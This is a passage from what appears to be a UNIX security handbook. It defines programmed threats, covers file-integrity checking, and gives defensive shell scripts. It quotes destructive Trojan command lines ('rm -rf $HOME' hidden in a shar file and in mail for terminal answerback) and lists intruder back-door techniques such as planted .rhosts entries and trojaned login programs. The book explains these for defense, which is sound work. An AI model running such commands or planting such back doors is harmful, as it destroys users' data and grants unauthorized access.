feature, only reinforces overall security.<br />




Chapter 11<br />

11. Protecting Against Programmed<br />

Threats<br />

Contents:<br />

Programmed Threats: Definitions<br />

Damage<br />

Authors<br />

Entry<br />

Protecting Yourself<br />

Protecting Your System<br />

The day is Friday, August 13, 1999. Hilary Nobel, a vice president at a major accounting firm, turns on<br />

her desktop computer to finish working on the financial analysis that she has been spending the last two<br />

months developing. But instead of seeing the usual login: and password: prompts, she sees a devilish<br />

message:<br />

Unix 5.0 Release 4<br />

Your operating license has been revoked by Data Death.<br />

Encrypting all user files....<br />

Call +011 49 4555 1234 to purchase the decryption key.<br />

What has happened? And how could Ms. Nobel have protected herself from the catastrophe?<br />

11.1 Programmed Threats: Definitions<br />

Computers are designed to execute instructions one after another. These instructions usually do<br />

something useful - calculate values, maintain databases, and communicate with users and with other<br />

systems. Sometimes, however, the instructions executed can be damaging or malicious in nature. When<br />

the damage happens by accident, we call the code involved a software bug. Bugs are perhaps the most<br />

common cause of unexpected program behavior.<br />

But if the source of the damaging instructions is an individual who intended that the abnormal behavior<br />

occur, we call the instructions malicious code, or a programmed threat. Some people use the term<br />

malware to describe malicious software.<br />


There are many different kinds of programmed threats. Experts classify threats by the way they behave,<br />

how they are triggered, and how they spread. In recent years, occurrences of these programmed threats<br />

have been described almost uniformly by the media as viruses. However, viruses make up only a small<br />

fraction of the malicious code that has been devised. Saying that all programmed data loss is caused by<br />

viruses is as inaccurate as saying that all human diseases are caused by viruses.<br />

Experts who work in this area have formal definitions of all of these types of software. However, not all<br />

the experts agree on common definitions. Thus, we'll consider the following practical definitions of<br />

malicious software:<br />

● Security tools and toolkits, which are usually designed to be used by security professionals to protect their sites, but which can also be used by unauthorized individuals to probe for weaknesses

● Back doors, sometimes called trap doors, which allow unauthorized access to your system

● Logic bombs, or hidden features in programs that go off after certain conditions are met

● Viruses, or programs that modify other programs on a computer, inserting copies of themselves

● Worms, programs that propagate from computer to computer on a network, without necessarily modifying other programs on the target machines

● Trojan horses, or programs that appear to have one function but actually perform another function

● Bacteria, or rabbit programs, which make copies of themselves to overwhelm a computer system's resources

Some of the threats mentioned above also have nondestructive uses. For example, worms can be used to<br />

do distributed computation on idle processors; back doors are useful for debugging programs; and viruses<br />

can be written to update source code and patch bugs. The purpose, not the approach, makes a<br />

programmed threat threatening.<br />

This chapter provides a general description of each threat, explains how it can affect your <strong>UNIX</strong> system,<br />

and describes how you can protect yourself against it. For more detailed information, refer to the books<br />

mentioned in Appendix D, Paper Sources.<br />

11.1.1 <strong>Sec</strong>urity Tools<br />

Recently, many programs have been written that can automatically scan for computer security<br />

weaknesses. These programs can quickly probe a computer or an entire network of computers for<br />

hundreds of weaknesses within a short period of time. SATAN, Tiger, ISS, and COPS are all examples<br />

of such tools.<br />

Most security tools are designed to be used by computer professionals to find problems with their own<br />

sites. The tools are highly automated and thorough. Naturally, these tools need to report the problems<br />

that they find, so that they can be corrected. Unfortunately, this requirement makes these tools useful to<br />

someone seeking flaws to exploit. Because these tools are readily obtainable, they are sometimes used by<br />

attackers seeking to compromise a system.<br />

There are also programs and tool sets whose only function is to attack computers. These programs are<br />


increasingly sophisticated and readily available on the <strong>Internet</strong> and various bulletin boards. These often<br />

require minimal knowledge and sophistication to use. Sites have reported break-ins from people using<br />

these tools to manipulate protocol-timing vulnerabilities and to change kernel data structures, only to<br />

have the intruders try to issue DOS commands on the <strong>UNIX</strong> machines: they were completely unfamiliar<br />

with <strong>UNIX</strong> itself!<br />

Because of the availability of security tools and high-quality attackware, you must be aware of potential<br />

vulnerabilities in your systems, and keep them protected and monitored. Some people believe that the<br />

only effective strategy for the security professional is to obtain the tools and run them before the bad<br />

guys do. There is some merit to this argument, but there are also many dangers. Some of the tools are not<br />

written with safety or portability in mind, and may damage your systems. Other tools can be<br />

booby-trapped to compromise your system clandestinely, when you think you are simply scanning for<br />

problems. And then there are always the questions of whether the tools are scanning for real problems,<br />

and whether system administrators can understand the output.<br />

For all these reasons, we suggest that you be aware of the tools and toolkits that may be available, but<br />

don't rush to use them yourself unless you are very certain you understand what they do and how they<br />

might help you secure your own system.<br />

11.1.2 Back Doors and Trap Doors<br />

Back doors, also called trap doors, are pieces of code written into applications or operating systems to<br />

grant programmers access to programs without requiring them to go through the normal methods of<br />

access authentication. Back doors and trap doors have been around for many years. They're typically<br />

written by application programmers who need a means of debugging or monitoring code that they are<br />

developing.<br />

Most back doors are inserted into applications that require lengthy authentication procedures, or long<br />

setups, requiring a user to enter many different values to run the application. When debugging the<br />

program, the developer may wish to gain special privileges, or to avoid all the necessary setup and<br />

authentication steps. The programmer also may want to ensure that there is a method of activating the<br />

program should something be wrong with the authentication procedure that is being built into the<br />

application. The back door is code that either recognizes some special sequence of input, or is triggered<br />

by being run from a certain user ID. It then grants special access.<br />

Back doors become threats when they're used by unscrupulous programmers to gain unauthorized access.<br />

They are also a problem when the initial application developer forgets to remove a back door after the<br />

system has been debugged and some other individual discovers the door's existence.<br />

Perhaps the most famous <strong>UNIX</strong> back door was the DEBUG option of the sendmail program, exploited<br />

by the <strong>Internet</strong> worm program in November of 1988. The DEBUG option was added for debugging<br />

sendmail. Unfortunately, the DEBUG option also had a back door in it, which allowed remote access of<br />

the computer over the network without an initial login. The DEBUG option was accidentally left enabled<br />

in the version of the program that was distributed by Sun Microsystems, Digital Equipment Corporation,<br />

and others.<br />

Sometimes, a cracker inserts a back door in a system after he successfully penetrates that system, so that he can regain access, or become root, at a later time. The back door gives the cracker a way to get back into the system. Back


doors take many forms. A cracker might:<br />

● Install an altered version of login, telnetd, ftpd, rshd, or some other program; the altered program usually accepts a special input sequence and spawns a shell for the user

● Plant an entry in the .rhosts file of a user or the superuser to allow future unauthorized access for the attacker

● Change the /etc/fstab file on an NFS system to remove the nosuid designator, allowing a legitimate user to become root without authorization through a remote program

● Add an alias to the mail system, so that when mail is sent to that alias, the mailer runs a program of the cracker's designation, possibly creating an entry into the system

● Change the owner of the /etc directory so the intruder can rename and subvert files such as /etc/passwd and /etc/group at a later time

● Change the file permissions of /dev/kmem or your disk devices so they can be modified by someone other than root

● Install a harmless-looking shell file somewhere that sets SUID so a user can use the shell to become root

● Change or add a network service to provide a root shell to a remote caller

Coupled with all of these changes, the intruder can modify timestamps, checksums, and audit programs<br />

so that the system administrator cannot detect the alteration!<br />

Protecting against back doors is complicated. The foremost defense is to check the integrity of important<br />

files regularly (see Chapter 9, Integrity Management). Also, scan the system periodically for SUID/SGID<br />

files, and check permissions and ownership of important files and directories periodically. For more<br />

information, see Chapter 5, The <strong>UNIX</strong> Filesystem, and Chapter 6, Cryptography.<br />
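
For example, a minimal sketch of such a periodic SUID/SGID scan might look like the following; the saved-list location and the idea of mailing the differences to root are assumptions you would adapt to your own site:

#!/bin/sh
# Sketch: list all SUID and SGID files on the system and compare the list
# against a previously saved copy, mailing any differences to the administrator.
# (Create /usr/adm/suidlist.last on a known clean system the first time.)
find / \( -perm -004000 -o -perm -002000 \) -type f -print > /tmp/suidlist.$$
diff /usr/adm/suidlist.last /tmp/suidlist.$$ | mail root
mv /tmp/suidlist.$$ /usr/adm/suidlist.last

Keep the saved list (and the script itself) where an intruder cannot quietly rewrite them, and run the check by hand from time to time rather than relying only on cron.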

Checking new software is also important, because new software - especially from sources that are<br />

unknown or not well-known - can (and occasionally does) contain back doors. If possible, read through<br />

and understand the source code of all software (if available) before installing it on your system. If you<br />

are suspicious of the software, don't use it, especially if it requires special privileges (being SUID root).<br />

Accept software only from trusted sources.<br />

As a matter of good policy, new software should first be installed on some noncritical systems for testing<br />

and familiarization. This practice gives you an opportunity to isolate problems, identify incompatibilities,<br />

and note quirks. Don't install new software first on a "live" production system!<br />

Note that you should not automatically trust software from a commercial firm or group. Sometimes<br />

commercial firms insert back doors into their code to allow for maintenance, or recovering lost<br />

passwords. These back doors might be secret today, but become well-known tomorrow. As long as<br />

customers (you) are willing to purchase software that comes with broad disclaimers of warranty and<br />

liability, there will be little incentive for vendors to be accountable for the code they sell. Thus, you<br />

might want to seek other, written assurances about any third-party code you buy and install on your<br />

computers.<br />


11.1.3 Logic Bombs<br />

Logic bombs are programmed threats that lie dormant in commonly used software for an extended period<br />

of time until they are triggered; at this point, they perform a function that is not the intended function of<br />

the program in which they are contained. Logic bombs usually are embedded in programs by software<br />

developers who have legitimate access to the system.<br />

Conditions that might trigger a logic bomb include the presence or absence of certain files, a particular<br />

day of the week, or a particular user running the application. The logic bomb might check first to see<br />

which users are logged in, or which programs are currently in use on the system. Once triggered, a logic<br />

bomb can destroy or alter data, cause machine halts, or otherwise damage the system. In one classic<br />

example, a logic bomb checked for a certain employee ID number and then was triggered if the ID failed<br />

to appear in two consecutive payroll calculations (i.e., the employee had left the company).<br />

Time-outs are a special kind of logic bomb that are occasionally used to enforce payment or other<br />

contract provisions. Time-outs make a program stop running after a certain amount of time unless some<br />

special action is taken. The SCRIBE text formatting system uses quarterly time-outs to require licensees<br />

to pay their quarterly license fees.<br />

Protect against malicious logic bombs in the same way that you protect against back doors: don't install<br />

software without thoroughly testing it and reading it. Keep regular backups so that if something happens,<br />

you can restore your data.<br />

11.1.4 Trojan Horses<br />

Trojan horses are named after the Trojan horse of myth. Analogous to their namesake, modern-day<br />

Trojan horses resemble a program that the user wishes to run - a game, a spreadsheet, or an editor. While<br />

the program appears to be doing what the user wants, it actually is doing something else unrelated to its<br />

advertised purpose, and without the user's knowledge. For example, the user may think that the program<br />

is a game. While it is printing messages about initializing databases and asking questions like "What do<br />

you want to name your player?" and "What level of difficulty do you want to play?" the program may<br />

actually be deleting files, reformatting a disk, or otherwise altering information. All the user sees, until<br />

it's too late, is the interface of a program that the user is trying to run. Trojan horses are, unfortunately, as<br />

common as jokes within some programming environments. They are often planted as cruel tricks on<br />

bulletin boards and circulated among individuals as shared software.<br />

One memorable example was posted as a shar format file on one of the Usenet source code groups

several years back. The shar file was long, and contained commands to unpack a number of files into the<br />

local directory. However, a few hundred lines into the shar file was a command sequence like this one:<br />

rm -rf $HOME<br />

echo Boom!<br />

Many sites reported losing files to this code. A few reported losing most of their filesystems because they<br />

were unwise enough to unpack the software while running as user root.<br />

An attacker can embed commands in places other than compiled programs. Shell files (especially shar<br />

files), awk, Perl, and sed scripts, TeX files, PostScript files, MIME-encoded mail, WWW pages, and<br />


even editor buffers can all contain commands that can cause you unexpected problems.<br />

Commands embedded in editor buffers present an especially subtle problem. Most editors allow<br />

commands to be embedded in the first few lines or the last few lines of files to let the editor<br />

automatically initialize itself and execute commands. By planting the appropriate few lines in a file, you<br />

could wreak all kinds of damage when the victim reads the buffer into his or her editor. See the<br />

documentation for your own editor to see how to disable this feature; see the later section called "Startup<br />

File Attacks," for the instructions to do this in GNU Emacs.<br />

Another form of a Trojan horse makes use of block-send commands or answerback modes in some<br />

terminals. Many brands of terminals support modes where certain sequences of control characters will<br />

cause the current line or status line to be answered back to the system as if it had been typed on the<br />

keyboard. Thus, a command can be embedded in mail that may read like this one:<br />

rm -rf $HOME & logout <br />

When the victim reads her mail, the line is echoed back as a command to be executed at the next prompt,<br />

and the evidence is wiped off the screen. By the time the victim logs back in, she is too late. Avoid or<br />

disable this feature if it is present on your terminal!<br />

A related form of a Trojan coerces a talk program into transmitting characters that lock up a keyboard, do<br />

a block send as described above, or otherwise change terminal settings. There are several utility<br />

programs available off the net to perform these functions, and more than a few multi-user games and IRC<br />

clients have hidden code to allow a knowledgeable user to execute these functions.<br />

The best way to avoid Trojan horses is to never execute anything, as a program or as input to an<br />

interpreter, until you have carefully read through the entire file. When you read the file, use a program or<br />

editor that displays control codes in a visible manner. If you do not understand what the file does, do not<br />

run it until you do. And never, ever run anything as root unless you absolutely must.<br />
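
For instance, before unpacking a shar file or piping anything to a shell, you might examine it with a pager and a filter that makes control characters visible (the filename here is only a placeholder):

cat -v suspicious.shar | more     # print control characters as ^X and M-x sequences
od -c suspicious.shar | more      # or dump every byte, including escape characters

If the listing shows escape sequences, embedded commands, or anything else you do not understand, do not run the file.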

If you are unpacking files or executing scripts for the first time, you might wish to do so on a secondary<br />

machine or use the chroot() system call in a restricted environment, to prevent the package from<br />

accessing files or directories outside its work area. (Starting a chroot() session requires superuser<br />

privilege, but you can change your user ID to a nonprivileged ID after the call is executed.)<br />
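
A rough sketch of such a restricted session follows; the directory names are placeholders, and the exact chroot command syntax varies among UNIX versions:

mkdir /var/tmp/jail /var/tmp/jail/bin     # empty work area for the package
cp /bin/sh /var/tmp/jail/bin              # the jail needs its own copy of a shell
cp package.shar /var/tmp/jail             # copy in only the file to be examined
chroot /var/tmp/jail /bin/sh              # must be run as the superuser; / is now the jail

Note that a jail like this contains only what you copy into it: on systems with shared libraries you must also copy in the libraries the shell needs, and if you want to switch to an unprivileged user ID inside the jail (as suggested above), you must copy in the commands and files that a program such as su requires.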

11.1.5 Viruses<br />

A true virus is a sequence of code that is inserted into other executable code, so that when the regular<br />

program is run, the viral code is also executed. The viral code causes a copy of itself to be inserted in one<br />

or more other programs. Viruses are not distinct programs - they cannot run on their own, and need to<br />

have some host program, of which they are a part, executed to activate them.<br />

Viruses are usually found on personal computers running unprotected operating systems, such as the<br />

Apple Macintosh and the IBM PC. Although viruses have been written for <strong>UNIX</strong> systems,[1] traditional<br />

viruses do not currently appear to pose a major threat to the <strong>UNIX</strong> community. Basically, any task that<br />

could be accomplished by a virus - from gaining root access to destroying files - can be accomplished<br />

through other, less difficult means. While <strong>UNIX</strong> binary-file viruses have been written as an intellectual<br />

curiosity, they are unlikely to become a major threat.<br />


[1] For a detailed account of one such virus, see "Experiences with Viruses on <strong>UNIX</strong><br />

Systems" by Tom Duff in Computing Systems, Usenix, Volume 2, Number 2, Spring 1989.<br />

The increased popularity of World Wide Web browsers and their kin, plus an increased market for<br />

cross-platform compatibility of office productivity tools, leads to an environment where macro viruses

and Trojan horses can thrive and spread. This environment in <strong>UNIX</strong> includes:<br />

● PostScript files that are FTP'd or transferred via WWW and automatically interpreted. PostScript can embed commands to alter the filesystem and execute commands, and an interpreter without a safety switch can cause widespread damage.

● WWW pages containing applets in languages such as Java that are downloaded and executed on the client host. Some of these languages allow the applets to open network connections to arbitrary machines, to spawn other processes, and to modify files. Denial of service attacks, and possibly others, are trivial using these mechanisms.

● MIME-encoded mail can contain files designed to overwrite local files, or contain encoded applications that, when run, perform malicious acts, including resending the same malicious code back out in mail.

● PC-based productivity tools that have been ported to UNIX. Many large companies want to transition their PC users to UNIX using the same software that they use on PCs. Thus, there is a market for firms who make PC software to have identical behavior in a UNIX-based version of their code. The result is software that can exchange macro-based viruses with PCs through sharing of data and macro source files.

There is also the rather interesting case now of versions of <strong>UNIX</strong> (and <strong>UNIX</strong>-like systems, such as<br />

Linux) that run on PC hardware. Some PC-based viruses, and boot-sector viruses in particular, can<br />

actually infect PCs running <strong>UNIX</strong>, although the infection is unlikely to spread very far. The computer<br />

usually becomes infected when a person leaves an infected floppy disk in the computer's disk drive and<br />

then reboots. The computer attempts to boot the floppy disk, and the virus executes, copying itself onto<br />

the computer's hard disk. The usual effect of these viruses is to make the <strong>UNIX</strong> PC fail to boot. That is<br />

because the viruses are written for PC execution and not for <strong>UNIX</strong>.<br />

You can protect yourself against viruses by means of the same techniques you use to protect your system<br />

against back doors and crackers:<br />

1. Run integrity checks on your system on a regular basis; this practice helps detect viruses as well as other tampering. (See Chapter 9.)

2. Don't include nonstandard directories (including .) in your execution search path.

3. Don't leave common bin directories (/bin, /usr/bin, /usr/ucb, etc.) unprotected (a sketch of such a check follows this list).

4. Set the file permissions of commands to a mode such as 555 or 511 to protect them against unauthorized alteration.

5. Don't load binary code onto your machine from untrusted sources.

6. Make sure your own directories are writable only by you and not by group or world.
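
Here is a minimal sketch of a check for the directory and permission advice above; the directory list is an assumption to adjust for your own system:

#!/bin/sh
# Sketch: report files or directories under the common system directories
# that are writable by group or world -- easy targets for unauthorized
# alteration of commands.
for dir in /bin /usr/bin /usr/ucb /etc
do
    find $dir \( -perm -020 -o -perm -002 \) -print
done

Run such a check by hand and investigate anything it reports; on most systems the list should be empty or very short.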


If you are using <strong>UNIX</strong> on a PC machine, be sure not to boot from questionable diskettes. The most<br />

widespread viruses in the PC world, and the ones that can have some effect on a <strong>UNIX</strong> PC, are boot<br />

viruses. These become active during the start-up process from an infected disk, and they alter the boot<br />

sector(s) on the internal hard disk. If you restart your PC with a diskette in the drive that has also been in<br />

an infected PC, you won't be able to boot to <strong>UNIX</strong>, and you may transfer a PC virus to your hard-disk<br />

boot block. The best defense is to always ensure that there is no floppy disk in your PC when you reboot:<br />

reboot from your hard drive.<br />

If your <strong>UNIX</strong> PC is infected with a virus, then you can disinfect it by booting from a trusted floppy and<br />

then rewriting the boot block.<br />

11.1.6 Worms<br />

Worms are programs that can run independently and travel from machine to machine across network<br />

connections; worms may have portions of themselves running on many different machines. Worms do<br />

not change other programs, although they may carry other code that does (for example, a true virus). We<br />

have seen about a dozen network worms, at least two of which were in the <strong>UNIX</strong> environment. Worms<br />

are difficult to write, but can cause much damage. Developing a worm requires a network environment<br />

and an author who is familiar not only with the network services and facilities, but also with the<br />

operating facilities required to support them once they've reached the machine.[2]<br />

[2] See "Computer Viruses and Programmed Threats" in Appendix D for other sources of<br />

information about the <strong>Internet</strong> worm of 1988, which clogged machines and networks as it<br />

spread.<br />

Protection against worm programs is like protection against break-ins. If an intruder can enter your<br />

machine, so can a worm program. If your machine is secure from unauthorized access, it should be<br />

secure from a worm program. All of our advice about protecting against unauthorized access applies here<br />

as well.<br />

An anecdote illustrates this theory. At the <strong>Sec</strong>ond Conference on Artificial Life in Santa Fe, New<br />

Mexico, in 1989, Russell Brand recounted a story of how one machine on which he was working<br />

appeared to be under attack by a worm program. Dozens of connections, one after another, were made to<br />

the machine. Each connection had the same set of commands executed, one after another, as attempts<br />

were made (and succeeded) to break in.<br />

After noticing that one sequence of commands had some typing errors, the local administrators realized<br />

that it wasn't a worm attack, but a large number of individuals breaking into the machine. Apparently,<br />

one person had found a security hole, had broken in, and had then posted a how-to script to a local<br />

bulletin board. The result: dozens of BBS users trying the same "script" to get on themselves! The sheer<br />

number of attempts being made at almost the same time appeared to be some form of automated attack.<br />

One bit of advice we do have: if you suspect that your machine is under attack by a worm program across<br />

the network, call one of the computer-incident response centers (see Appendix F, Organizations) to see if<br />

other sites have made similar reports. You may be able to get useful information about how to protect or<br />

recover your system in such a case. We also recommend that you sever your network connections<br />

immediately to isolate your local network. If there is already a worm program loose in your system, you<br />

may help prevent it from spreading, and you may also prevent important data from being sent outside of<br />


your local area network. If you've done a good job with your backups and other security, little should be<br />

damaged.<br />
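
If you do decide to isolate a machine in a hurry, one very rough sketch is simply to take its network interfaces down (the interface name le0 is only an example; use netstat -i to list the interfaces on your own system):

ifconfig le0 down     # take the interface offline; must be run as the superuser

Physically disconnecting the network cable accomplishes the same thing and cannot be undone by software running on the compromised machine.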

11.1.7 Bacteria and Rabbits<br />

Bacteria, also known as rabbits, are programs that do not explicitly damage any files. Their sole purpose<br />

is to replicate themselves. A typical bacteria or rabbit program may do nothing more than execute two<br />

copies of itself simultaneously on multiprogramming systems, or perhaps create two new files, each of<br />

which is a copy of the original source file of the bacteria program. Both of those programs then may copy<br />

themselves twice, and so on. Bacteria reproduce exponentially, eventually taking up all the processor<br />

capacity, memory, or disk space, denying the user access to those resources.<br />

This kind of attack is one of the oldest forms of programmed threats. Users of some of the earliest<br />

multiprocessing machines ran these programs either to take down the machine or simply to see what<br />

would happen. Machines without quotas and resource-usage limits are especially susceptible to this form<br />

of attack.<br />

The kinds of bacteria programs you are likely to encounter on a <strong>UNIX</strong> system are described in Chapter<br />

25, Denial of Service Attacks and Solutions.<br />

NOTE: We suggest that you be extremely cautious about importing source code and<br />

command files from outside, untrusted sources. Programs shipped on Usenet source code<br />

groups should not be considered as completely trusted, nor should source code obtained by<br />

FTP (e.g., do you read the entire source code for EMACS each time a new release is issued?<br />

How do you know there is no unfriendly code patched in?). We strongly urge that you never<br />

download binary files from newsgroups and accept only binary code from sites under<br />

conditions where you absolutely trust the source.<br />



Chapter 9: Integrity Management

9.2 Detecting Change

As we saw in the last section, there may be circumstances in which we cannot use read-only media to protect files and<br />

directories. Or, we may have a case in which some of the important files are relatively volatile and need to change on a<br />

regular basis. In cases such as these, we want to be able to detect if unauthorized changes occur.<br />

There are basically three approaches to detecting changes to files and inodes. The first and most certain way is to use<br />

comparison copies of the data to be monitored. A second way is to monitor metadata about the items to be protected. This<br />

includes monitoring the modification time of entries as kept by the operating system, and monitoring any logs or audit<br />

trails that show alterations to files. The third way is to use some form of signature of the data to be monitored, and to<br />

periodically recompute and compare the signature against a stored value. Each of these approaches has drawbacks and<br />

benefits, as we discuss below.<br />

9.2.1 Comparison Copies<br />

The most direct and assured method of detecting changes to data is to keep a copy of the unaltered data, and do a<br />

byte-by-byte comparison when needed. If there is a difference, this indicates not only that a change occurred, but what that<br />

change involved. There is no more certain and complete method of detecting changes.<br />

Comparison copies, however, are unwieldy. They require that you keep copies of every file of interest. Not only does such<br />

a method require twice as much storage as the original files, it also may involve a violation of license or copyright of the<br />

files (copyright law allows one copy for archival purposes, and your distribution media is that one copy).[3] To use a<br />

comparison copy means that both the original and the copy must be read through byte by byte each time a check is made.<br />

And, of course, the comparison copy needs to be saved in a protected location.<br />

[3] Copyright law does not allow for copies on backups.<br />

Even with these drawbacks, comparison copies have a particular benefit - if you discover an unauthorized change, you can<br />

simply replace the altered version with the saved comparison copy, thus restoring the system to normal.<br />

9.2.1.1 Local copies<br />

One standard method of storing comparison copies is to put them on another disk. Many people report success at storing<br />

copies of critical system files on removable media, such as Syquest or Bernoulli drives. If there is any question about a<br />

particular file, the appropriate disk is placed in the drive, mounted, and compared. If you are careful about how you<br />

configure these disks, you get the added (and valuable) benefit of having a known good version of the system to boot up if<br />

the system is compromised by accident or attack.<br />

A second standard method of storing comparison copies is to make on-disk copies somewhere else on the system. For<br />

instance, you might keep a copy of /bin/login in /usr/adm/.hidden/.bin/login. Furthermore, you might compress and/or<br />

encrypt the copy to help reduce disk use and keep it safe from tampering; if an attacker were to alter both the original<br />

/bin/login and the copy, then any comparison you made would show no change. The disadvantage to compression and<br />

encryption is that it then requires extra processing to recover the files if you want to compare them against the working<br />

copies. This extra effort may be significant if you wish to do comparisons daily (or more often!).<br />


9.2.1.2 Remote copies<br />

A third method of using comparison copies is to store them on a remote site and make them available remotely in some<br />

manner. For instance, you might place copies of all the system files on a disk partition on a secured server, and export that<br />

partition read-only using NFS or some similar protocol. All the client hosts could then mount that partition and use the<br />

copies in local comparisons. Of course, you need to ensure that whatever programs are used in the comparison (e.g., cmp,<br />

find, and diff) are taken from the remote partition and not from the local disk. Otherwise, an attacker could modify those<br />

files to not report changes!<br />
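
A rough sketch of such a check, assuming the secured server's copies are mounted read-only on /mnt/master and mirror the normal filesystem layout, might be:

#!/bin/sh
# Sketch: compare a few critical local binaries against master copies on a
# read-only NFS mount.  The mount point and the file list are assumptions;
# note that cmp itself is taken from the master copy, not the local disk.
MASTER=/mnt/master
for f in /bin/login /bin/su /usr/bin/passwd
do
    $MASTER/usr/bin/cmp -s $MASTER$f $f || echo "$f differs from master copy"
done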

9.2.1.3 rdist<br />

Another method of remote comparison would be to use a program to do the comparison across the network. The rdist<br />

utility is one such program that works well in this context. The drawback to using rdist, however, is the same as with using<br />

full comparison copies: you need to read both versions of each file, byte by byte. The problem is compounded, however,<br />

because you need to transfer one copy of each file across the network each time you perform a check. Another drawback is<br />

that rdist depends on the Berkeley trusted hosts mechanism to work correctly (unless you have Kerberos installed), and<br />

this may open the systems more than you want to allow.<br />

NOTE: If you have an older version of rdist, be certain to check with your vendor for an update. Some<br />

versions of rdist can be exploited to gain root access to a system. See CERT advisories 91-20 and 94-04 for<br />

more information.<br />

One scenario we have found to work well with rdist is to have a "master" configuration for each architecture you support<br />

at your site. This "master" machine should not generally support user accounts, and it should have extra security measures<br />

in place. On this machine, you put your master software copies, possibly installed on read-only disks.<br />

Periodically, the master machine copies a clean copy of the rdist binary to the client machine to be checked. The master<br />

machine then initiates an rdist session involving the -b option (byte-by-byte compare) against the client. Differences are<br />

reported, or optionally, fixed. In this manner you can scan and correct dozens or hundreds of machines automatically. If<br />

you use the -R option, you can also check for new files or directories that are not supposed to be present on the client<br />

machine.<br />
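
A minimal sketch of such a check, assuming the traditional BSD rdist Distfile syntax and hypothetical client names, might look like this:

# Distfile on the master machine
FILES = ( /bin /usr/bin /etc )
CLIENTS = ( client1 client2 client3 )

${FILES} -> ${CLIENTS}
        install ;
        notify root ;

which the master machine might then run as:

rdist -b -f Distfile         # byte-by-byte comparison; out-of-date files are fixed
rdist -b -v -f Distfile      # -v reports differences without changing anything

Remember that the clients must trust the master (through the trusted hosts mechanism or Kerberos, as noted above) for these sessions to work.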

An rdist "master" machine has other advantages. It makes it much easier to install new and updated software on a large set<br />

of client machines. This feature is especially helpful when you are in a rush to install the latest security patch in software<br />

on every one of your machines. It also provides a way to ensure that the owners and modes of system files are set correctly<br />

on all the clients. The down side of this is that if you are not careful, and an attacker modifies your master machine, rdist<br />

will as efficiently install the same security hole on every one of your clients, automatically!<br />

Note that the normal mode of operation of rdist, without the -b option, does not do a byte-by-byte compare. Instead, it only<br />

compares the metadata in the Inode concerning times and file sizes. As we discuss in the next section, this information can<br />

be spoofed.<br />

9.2.2 Checklists and Metadata<br />

Saving an extra copy of each critical file and performing a byte-by-byte comparison can be unduly expensive. It requires<br />

substantial disk space to store the copies. Furthermore, if the comparison is performed over the network, either via rdist or<br />

NFS, it will involve substantial disk and network overhead each time the comparisons are made.<br />

A more efficient approach would be to store a summary of important characteristics of each file and directory. When the<br />

time comes to do a comparison, the characteristics are regenerated and compared with the saved information. If the<br />

characteristics are comprehensive and smaller than the file contents (on average), then this method is clearly a more<br />

efficient way of doing the comparison.<br />

Furthermore, this approach can capture changes that a simple comparison copy cannot: comparison copies detect changes<br />

in the contents of files, but do little to detect changes in metadata such as file owners or protection modes. It is this data -<br />

the data normally kept in the Inodes of files and directories - that is sometimes more important than the data within the<br />


files themselves. For instance, changes in owner or protection bits may result in disaster if they occur to the wrong file or<br />

directory.<br />

Thus, we would like to compare the values in the inodes of critical files and directories with a database of comparison<br />

values. The values we wish to compare and monitor for critical changes are owner, group, and protection modes. We also<br />

wish to monitor the mtime (modification time) and the file size to determine if the file contents change in an unauthorized<br />

or unexpected manner. We may also wish to monitor the link count, Inode number, and ctime as additional indicators of<br />

change. All of this material can be listed with the ls command.<br />

9.2.2.1 Simple listing<br />

The simplest form of a checklist mechanism is to run the ls command on a list of files and compare the output against a<br />

saved version. The most primitive approach might be a shell script such as this:<br />

#!/bin/sh<br />

cat /usr/adm/filelist | xargs ls -ild > /tmp/now<br />

diff -b /usr/adm/savelist /tmp/now<br />

The file /usr/adm/filelist would contain a list of files to be monitored. The /usr/adm/savelist file would contain a base<br />

listing of the same files, generated on a known secure version of the system. The -i option adds the inode number in the<br />

listing. The -d option includes directory properties, rather than contents, if the entry is a directory name.<br />

This approach has some drawbacks. First of all, the output does not contain all of the information we might want to<br />

monitor. A more complete listing can be obtained by using the find command:<br />

#!/bin/sh<br />

find `cat /usr/adm/filelist` -ls > /tmp/now<br />

diff -b /usr/adm/savelist /tmp/now<br />

This will not only give us the data to compare on the entries, but it will also disclose if files have been deleted or added to<br />

any of the monitored directories.<br />

NOTE: Writing a script to do the above and running it periodically from a cron file can seem tempting. The<br />

difficulty with this approach is that an attacker may modify the cron entry or the script itself to not report any<br />

changes. Thus, be cautious if you take this approach and be sure to review and then execute the script<br />

manually on a regular basis.<br />

9.2.2.2 Ancestor directories<br />

We should mention here that you must check the ancestor directories of all critical files and directories - all the directories<br />

between the root directory and the files being monitored. These are often overlooked, but can present a significant problem<br />

if their owner or permissions are altered. An attacker could then be able to rename one of the directories and install a<br />

replacement or a symbolic link to a replacement that contains dangerous information. For instance, if the /etc directory<br />

becomes mode 777, then anyone could temporarily rename the password file, install a replacement containing a root entry<br />

with no password, run su, and reinstall the old password file. Any commands or scripts you have that monitor the password<br />

file would show no change unless they happen to run during the few seconds of the actual attack - something the attacker<br />

can usually avoid.<br />

The following script takes a list of absolute file pathnames, determines the names of all containing directories, and then prints them. These directories can then be added to the checklist file used by the scripts shown earlier:

#!/bin/ksh
typeset pdir

function getdir # Gets the real, physical pathname
{
    if [[ $1 != /* ]]
    then
        print -u2 "$1 is not an absolute pathname"
        return 1
    elif cd "${1%/*}"
    then
        pdir=$(pwd -P)
        cd ~-
    else
        print -u2 "Unable to attach to directory of $1"
        return 2
    fi
    return 0
}

cd /
print /    # ensure we always have the root directory included
while read name
do
    getdir $name || continue
    while [[ -n $pdir ]]
    do
        print $pdir
        pdir=${pdir%/*}
    done
done | sort -u

9.2.3 Checksums and Signatures<br />

Unfortunately, the approach we described above for monitoring files can be defeated with a little effort. Files can be<br />

modified in such a way that the information we monitor will not disclose the change. For instance, a file might be modified<br />

by writing to the raw disk device after the appropriate block is known. As the modification did not go through the<br />

filesystem, none of the information in the inodes will be altered.<br />

You could also surreptitiously alter a file by setting the system clock back to the time of the last legitimate change, making<br />

the edits, and then setting the clock forward again. If this is done quickly enough, no one will notice the change.<br />

Furthermore all the times on the file (including the ctime) will be set to the "correct" values. Several hacker toolkits in<br />

widespread use on the <strong>Internet</strong> actually take this approach. It is easier and safer than writing to the raw device. It is also<br />

more portable.<br />

Thus, we need to have some stronger approach in place to check the contents of files against a known good value.<br />

Obviously, we could use comparison copies, but we have already noted that they are expensive. A second approach would<br />

be to create a signature of the file's contents to determine if a change occurred.<br />

The first, naive approach with such a signature might involve the use of a standard CRC checksum, as implemented by the<br />

sum command. CRC polynomials are often used to detect changes in message transmissions, so they could logically be<br />

applied here. However, this application would be a mistake.<br />

